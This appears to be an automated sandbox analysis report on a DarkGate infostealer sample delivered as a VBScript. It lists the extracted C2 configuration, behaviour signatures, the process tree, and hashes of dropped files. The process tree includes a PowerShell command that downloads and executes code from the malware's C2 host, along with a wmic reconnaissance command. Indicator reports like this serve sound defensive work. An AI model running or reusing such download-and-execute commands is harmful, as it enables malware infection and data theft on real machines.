Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 10:32

General

  • Target

    filter0912.2.vbs

  • Size

    250B

  • MD5

    0f5e506c6622ef23867764b600e2c4b4

  • SHA1

    e6b079ecc9537672cc3b8390b0509770045b9bbd

  • SHA256

    793b4e318eba9ef99173836a92ef2959a9ff73026647c0714ab7280f0dbe3fac

  • SHA512

    48fca5308d3a37a7ab974c299c689ce8122b355eb44fe8bc033c80481f73fe74c13586b122d8e86fcd4d26d24153e5a034a8e7262801e3716a2010cbbc8f0b85

Malware Config

Extracted

Family

darkgate

Botnet

drk3

C2

todayput.shop

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    sEhfQzVh

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    drk3

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Darkgate family
  • Detect DarkGate stealer 7 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs

    Using AutoIT for possible automate script.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
      PID:2748
      • C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:624
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
        PID:3940
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:4044
          • C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
            2⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:4820
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"
          1⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3196
          • C:\bhqs\yyii\Autoit3.exe
            "C:\bhqs\yyii\Autoit3.exe" C:\bhqs\yyii\script.a3x
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Command and Scripting Interpreter: AutoIT
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2272
            • \??\c:\windows\SysWOW64\cmd.exe
              "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hcbchdd\beecfkf
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:908
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic ComputerSystem get domain
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4552

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\hcbchdd\beecfkf

          Filesize

          54B

          MD5

          c8bbad190eaaa9755c8dfb1573984d81

          SHA1

          17ad91294403223fde66f687450545a2bad72af5

          SHA256

          7f136265128b7175fb67024a6ddd7524586b025725a878c07d76a9d8ad3dc2ac

          SHA512

          05f02cf90969b7b9a2de39eecdf810a1835325e7c83ffe81388c9866c6f79be6cdc8617f606a8fedc6affe6127bede4b143106a90289bbb9bf61d94c648059df

        • C:\ProgramData\hcbchdd\kgfaagf

          Filesize

          1KB

          MD5

          319ff25b70e29a3310dde4e4d241f82b

          SHA1

          795cde9b62b8c0e25a2a2d4b5821ac06787b1632

          SHA256

          27b38046d4b6a02d22c16cdbde725b631b29b6bad2af7e0454d436abaa80c79a

          SHA512

          95ea94b96c6e5b7147e934f6633ee23acd9d6d45da7e781b8dce96bdf448feea8bd5bd5482d12ef2d422113d4d2e1b8f25eb922f59f6b4216e7a14c7d421a043

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jp4kyo3y.qy1.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\HAEKCch

          Filesize

          32B

          MD5

          a011babbccef95bd193744a0f5122550

          SHA1

          cfedfdb25d276b551a0cf5a8c6b6a45a7b695962

          SHA256

          d2934e6da2e5791a957fa7068db1057b42b40f56074912b66a9917b746dd07c2

          SHA512

          5b1200823845167f4ccdcf8a92848cd9e76a14ba383df23264a8cd5e171b77d2fd3f8f26631f94c514829761be2200bf4bdc67c11ba39faa7075640f4d9d5be8

        • C:\bhqs\yyii\Autoit3.exe

          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        • C:\bhqs\yyii\script.a3x

          Filesize

          581KB

          MD5

          2bf27a4ef77513aa86659950f589a089

          SHA1

          e5238f7403f90cc1998f312504707c86585f9da5

          SHA256

          fce2d534623887f17922412cd8b9e4313a695db76573d69dda0f2693b3a0353f

          SHA512

          3c599dc4b5b88966f4657130324d122191500e1ecf4ac912a7c7d31c3d35b2fab9e951831484b63e4d0cfcaabfc7a305e4b91c448533fc1f2e2d4f6ad30fdb9d

        • C:\temp\acbhded

          Filesize

          4B

          MD5

          3dd7326471f0ce39b622289fc316b50a

          SHA1

          e6d00cd0e630c9c894ed7b723706f7f65213e898

          SHA256

          cec38cb7894fdd48d59b3e2c0b56635d7c58aafb11e12c6201c8dca67e386320

          SHA512

          67f73896221028ca04867ec99e03f86f85cc410a6d2fa5dca66a5211923797e6bdba25caf0289f4e345597410f78fd489405072fab2e778c83477da885da672a

        • C:\temp\fkehffh

          Filesize

          4B

          MD5

          24a941443055434988585baf9070ad0b

          SHA1

          4e712ed1b882ec06d4141d9a6678a65a8acdcdac

          SHA256

          5865015c6c841756179d356bed2d00c8a57c589e7798e71e939e84556f9c645f

          SHA512

          c0d18bf171c83c4b2398ab3bb7f02fc29e6af21a1cb3cd56af42acb3239e61e9ae7500e9b1d92c21ba5562e83666ee78da2256f1d38189d7c79950000b7c73c6

        • C:\temp\fkehffh

          Filesize

          4B

          MD5

          537151830d88d35fac209d60183b2326

          SHA1

          c0014036cdfe32daba364e91c74438a00e93b0fb

          SHA256

          81092cb0748a0c10bf5490b14879c8d06a5f1fa486fdc43494cb0013c26d3ebf

          SHA512

          55323f9f60ecfa875386d53d9f86b404dcf02e035fcdeb2fac26aaf71f24c6607d35881836a9519a28aced76ce2b2f728b9fa1bcf2239735f8746848d739e1aa

        • memory/624-53-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-50-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-52-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-49-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-51-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-43-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/3196-15-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-17-0x000002377D590000-0x000002377D59A000-memory.dmp

          Filesize

          40KB

        • memory/3196-13-0x000002377DB40000-0x000002377DD02000-memory.dmp

          Filesize

          1.8MB

        • memory/3196-0-0x00007FFB5E6D3000-0x00007FFB5E6D5000-memory.dmp

          Filesize

          8KB

        • memory/3196-25-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-16-0x000002377D930000-0x000002377D942000-memory.dmp

          Filesize

          72KB

        • memory/3196-10-0x000002377D5C0000-0x000002377D5E2000-memory.dmp

          Filesize

          136KB

        • memory/3196-12-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-11-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/4820-54-0x0000000002600000-0x0000000002DA2000-memory.dmp

          Filesize

          7.6MB